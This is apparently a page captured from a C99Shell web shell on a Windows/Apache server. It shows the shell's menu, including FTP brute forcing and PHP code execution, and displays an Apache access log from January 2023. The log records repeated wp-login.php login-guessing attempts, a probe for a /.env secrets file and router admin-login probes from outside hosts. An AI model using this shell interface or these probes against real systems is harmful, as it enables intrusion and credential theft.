!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.01.10.log (5.86 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
216.245.221.92 - - [10/Jan/2023:00:01:43 -0500] "HEAD / HTTP/1.1" 200 -
168.119.253.48 - - [10/Jan/2023:00:02:40 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [10/Jan/2023:00:03:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:00:03:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:00:04:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [10/Jan/2023:00:06:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:00:08:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
66.249.73.127 - - [10/Jan/2023:00:09:36 -0500] "-" 408 -
172.22.2.4 - - [10/Jan/2023:00:09:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:00:09:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
216.245.221.92 - - [10/Jan/2023:00:11:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:00:13:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
69.63.184.117 - - [10/Jan/2023:00:14:45 -0500] "GET /images/Aire%20Reyes%20(1)%20(1).jpeg HTTP/1.1" 200 59709
66.249.73.127 - - [10/Jan/2023:00:16:02 -0500] "-" 408 -
172.22.2.4 - - [10/Jan/2023:00:14:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jan/2023:00:16:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:00:15:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
201.245.192.253 - - [10/Jan/2023:00:18:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
201.245.192.253 - - [10/Jan/2023:00:18:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43601
201.245.192.253 - - [10/Jan/2023:00:18:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43804
216.245.221.92 - - [10/Jan/2023:00:21:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [10/Jan/2023:00:22:05 -0500] "-" 408 -
172.22.2.4 - - [10/Jan/2023:00:20:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:00:21:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53337
201.245.192.253 - - [10/Jan/2023:00:23:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
190.102.126.66 - - [10/Jan/2023:00:24:17 -0500] "GET /BLA/resoluciones/AUTOS%202014/3777.pdf HTTP/1.1" 200 554744
66.249.66.89 - - [10/Jan/2023:00:24:23 -0500] "-" 408 -
216.245.221.92 - - [10/Jan/2023:00:26:43 -0500] "HEAD / HTTP/1.1" 200 -
31.13.127.5 - - [10/Jan/2023:00:26:54 -0500] "GET /images/Reciclaton%20Nov%202022%20(1)%20(1).jpeg HTTP/1.1" 200 53811
66.249.73.127 - - [10/Jan/2023:00:27:55 -0500] "-" 408 -
172.22.2.4 - - [10/Jan/2023:00:26:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:00:28:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
207.46.13.83 - - [10/Jan/2023:00:28:57 -0500] "GET /BLA/resoluciones/AUTOS%202020/2090.pdf HTTP/1.1" 304 -
201.245.192.253 - - [10/Jan/2023:00:28:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43601
185.119.81.106 - - [10/Jan/2023:00:28:59 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
201.245.192.253 - - [10/Jan/2023:00:28:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43804
185.119.81.106 - - [10/Jan/2023:00:29:01 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [10/Jan/2023:00:27:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
185.119.81.101 - - [10/Jan/2023:00:30:40 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [10/Jan/2023:00:30:41 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [10/Jan/2023:00:31:43 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.106 - - [10/Jan/2023:00:32:17 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [10/Jan/2023:00:32:18 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
107.170.239.18 - - [10/Jan/2023:00:32:20 -0500] "GET / HTTP/1.1" 200 319
185.119.81.101 - - [10/Jan/2023:00:33:01 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [10/Jan/2023:00:33:02 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [10/Jan/2023:00:33:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
205.185.118.237 - - [10/Jan/2023:00:33:07 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
66.249.73.127 - - [10/Jan/2023:00:33:39 -0500] "-" 408 -
172.22.2.4 - - [10/Jan/2023:00:32:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:00:33:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [10/Jan/2023:00:36:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:00:38:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
201.245.192.253 - - [10/Jan/2023:00:38:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43601
201.245.192.253 - - [10/Jan/2023:00:38:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43804
172.22.2.4 - - [10/Jan/2023:00:38:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:00:39:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
216.245.221.92 - - [10/Jan/2023:00:41:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [10/Jan/2023:00:42:52 -0500] "-" 408 -
201.245.192.253 - - [10/Jan/2023:00:43:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:00:44:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:00:44:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56474
216.245.221.92 - - [10/Jan/2023:00:46:43 -0500] "HEAD / HTTP/1.1" 200 -
162.55.171.138 - - [10/Jan/2023:00:47:55 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [10/Jan/2023:00:48:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
157.55.39.201 - - [10/Jan/2023:00:51:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%201200-1249.tif HTTP/1.1" 200 4262737
172.22.2.4 - - [10/Jan/2023:00:49:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jan/2023:00:51:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:00:50:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54100
201.245.192.253 - - [10/Jan/2023:00:53:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
207.46.13.41 - - [10/Jan/2023:00:54:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1345.pdf HTTP/1.1" 304 -
69.194.182.218 - - [10/Jan/2023:00:54:49 -0500] "GET /.env HTTP/1.1" 404 1018
69.194.182.218 - - [10/Jan/2023:00:54:50 -0500] "POST / HTTP/1.1" 200 319
216.245.221.92 - - [10/Jan/2023:00:56:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:00:55:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:00:58:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:00:56:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [10/Jan/2023:01:01:43 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.106 - - [10/Jan/2023:01:03:05 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [10/Jan/2023:01:03:06 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [10/Jan/2023:01:03:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:01:01:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.102.126.66 - - [10/Jan/2023:01:03:17 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 886125
172.22.2.4 - - [10/Jan/2023:01:02:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53739
172.22.2.4 - - [10/Jan/2023:01:04:48 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2005%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 304 -
207.46.13.69 - - [10/Jan/2023:01:05:00 -0500] "GET /dos-mamiferos-y-63-aves-volvieron-a-la-libertad-en-el-humedal-la-conejera.html HTTP/1.1" 200 877
216.245.221.92 - - [10/Jan/2023:01:06:43 -0500] "HEAD / HTTP/1.1" 200 -
152.61.192.232 - - [10/Jan/2023:01:07:02 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [10/Jan/2023:01:08:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
185.189.182.234 - - [10/Jan/2023:01:09:01 -0500] "GET / HTTP/1.1" 400 946
172.22.2.4 - - [10/Jan/2023:01:07:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:01:08:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
216.245.221.92 - - [10/Jan/2023:01:11:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:01:13:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:01:13:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:01:15:44 -0500] "GET /BLA/boletinlegal/ab2g HTTP/1.1" 404 1018
172.22.2.4 - - [10/Jan/2023:01:14:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52942
172.22.2.4 - - [10/Jan/2023:01:15:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [10/Jan/2023:01:15:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [10/Jan/2023:01:16:43 -0500] "HEAD / HTTP/1.1" 200 -
205.185.118.237 - - [10/Jan/2023:01:16:33 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
201.245.192.253 - - [10/Jan/2023:01:18:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
201.245.192.253 - - [10/Jan/2023:01:18:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43447
201.245.192.253 - - [10/Jan/2023:01:18:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43802
152.61.128.50 - - [10/Jan/2023:01:20:02 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [10/Jan/2023:01:19:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:01:19:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
216.245.221.92 - - [10/Jan/2023:01:21:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:01:23:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:01:24:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jan/2023:01:26:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:01:25:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [10/Jan/2023:01:28:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
201.245.192.253 - - [10/Jan/2023:01:28:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43447
201.245.192.253 - - [10/Jan/2023:01:28:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43802
185.119.81.101 - - [10/Jan/2023:01:29:12 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [10/Jan/2023:01:29:13 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
216.245.221.92 - - [10/Jan/2023:01:31:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:01:30:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:01:33:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:01:31:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
216.245.221.92 - - [10/Jan/2023:01:36:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:01:37:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:01:36:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:01:38:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43447
201.245.192.253 - - [10/Jan/2023:01:38:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43802
172.22.2.4 - - [10/Jan/2023:01:37:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52453
185.119.81.99 - - [10/Jan/2023:01:39:21 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.99 - - [10/Jan/2023:01:39:22 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
216.245.221.92 - - [10/Jan/2023:01:41:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:01:42:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:01:42:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:01:43:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
185.119.81.99 - - [10/Jan/2023:01:45:14 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.99 - - [10/Jan/2023:01:45:15 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
152.61.192.232 - - [10/Jan/2023:01:46:38 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [10/Jan/2023:01:46:39 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [10/Jan/2023:01:46:39 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [10/Jan/2023:01:46:43 -0500] "HEAD / HTTP/1.1" 200 -
114.107.225.150 - - [10/Jan/2023:01:47:34 -0500] "GET /portaldeninos HTTP/1.1" 404 1035
201.245.192.253 - - [10/Jan/2023:01:47:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:01:48:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:01:49:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
216.245.221.92 - - [10/Jan/2023:01:51:43 -0500] "HEAD / HTTP/1.1" 200 -
128.14.134.170 - - [10/Jan/2023:01:52:53 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [10/Jan/2023:01:52:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:01:54:09 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1140
172.22.2.4 - - [10/Jan/2023:01:54:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:01:54:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [10/Jan/2023:01:56:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:01:57:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:01:59:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jan/2023:02:01:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:02:00:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [10/Jan/2023:02:02:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
216.245.221.92 - - [10/Jan/2023:02:06:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:02:05:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:02:07:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:02:06:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [10/Jan/2023:02:11:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:02:12:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:02:11:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:02:12:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
152.61.128.50 - - [10/Jan/2023:02:15:44 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [10/Jan/2023:02:15:46 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [10/Jan/2023:02:15:46 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [10/Jan/2023:02:16:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:02:17:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
66.249.73.127 - - [10/Jan/2023:02:18:02 -0500] "-" 408 -
201.245.192.253 - - [10/Jan/2023:02:18:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43924
201.245.192.253 - - [10/Jan/2023:02:18:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43961
172.22.2.4 - - [10/Jan/2023:02:17:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:02:18:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
199.16.157.183 - - [10/Jan/2023:02:21:36 -0500] "GET /images/Mujeres%20que%20reverdecen%201%20sept.jpeg HTTP/1.1" 200 134076
199.16.157.183 - - [10/Jan/2023:02:21:36 -0500] "GET /images/Mujeres%20que%20reverdecen%201%20sept.jpeg HTTP/1.1" 200 134076
216.245.221.92 - - [10/Jan/2023:02:21:43 -0500] "HEAD / HTTP/1.1" 200 -
128.1.248.26 - - [10/Jan/2023:02:22:47 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
201.245.192.253 - - [10/Jan/2023:02:22:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:02:23:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:02:24:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54816
195.154.77.190 - - [10/Jan/2023:02:25:39 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
216.245.221.92 - - [10/Jan/2023:02:26:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:02:27:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
201.245.192.253 - - [10/Jan/2023:02:28:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43924
201.245.192.253 - - [10/Jan/2023:02:28:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43961
185.119.81.101 - - [10/Jan/2023:02:29:07 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [10/Jan/2023:02:29:08 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
207.46.13.41 - - [10/Jan/2023:02:29:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2393.pdf HTTP/1.1" 304 -
195.133.40.86 - - [10/Jan/2023:02:29:51 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
207.46.13.142 - - [10/Jan/2023:02:30:27 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=wl1ii0cvgutsycy3vo6ksgzc.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
172.22.2.4 - - [10/Jan/2023:02:29:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:02:30:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [10/Jan/2023:02:29:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46778
216.245.221.92 - - [10/Jan/2023:02:31:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:02:32:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:02:34:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jan/2023:02:36:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:02:35:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [10/Jan/2023:02:37:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:02:38:55 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [10/Jan/2023:02:38:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43924
172.22.2.4 - - [10/Jan/2023:02:38:58 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%204%20del%2006%20de%20Junio%20de%202014.pdf HTTP/1.1" 200 236794
201.245.192.253 - - [10/Jan/2023:02:38:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43961
64.62.197.75 - - [10/Jan/2023:02:39:05 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
185.119.81.101 - - [10/Jan/2023:02:39:50 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [10/Jan/2023:02:39:51 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
185.119.81.106 - - [10/Jan/2023:02:40:36 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [10/Jan/2023:02:40:37 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [10/Jan/2023:02:41:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:02:40:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:02:42:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:02:41:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
172.22.2.4 - - [10/Jan/2023:02:43:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
185.119.81.106 - - [10/Jan/2023:02:45:49 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [10/Jan/2023:02:45:49 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [10/Jan/2023:02:46:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:02:47:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:02:46:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:02:47:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
157.55.39.180 - - [10/Jan/2023:02:51:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=j+qily0ua4jitjukvc1-f9oy.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
216.245.221.92 - - [10/Jan/2023:02:51:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:02:52:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:02:52:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:02:53:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
185.119.81.106 - - [10/Jan/2023:02:56:42 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [10/Jan/2023:02:56:42 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
216.245.221.92 - - [10/Jan/2023:02:56:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:02:57:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:02:58:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.201 - - [10/Jan/2023:03:00:16 -0500] "GET /php/CarreraAdministrativa/HERRAMIENTA_EVALUACION_SDA1_NIVEL_TECNICO1_2010.xls HTTP/1.1" 404 1018
172.22.2.4 - - [10/Jan/2023:02:59:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54816
172.22.2.4 - - [10/Jan/2023:03:01:30 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000020%20del%2020%20de%20diciembre%20de%202019.pdf HTTP/1.1" 304 -
216.245.221.92 - - [10/Jan/2023:03:01:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:03:02:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:03:04:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
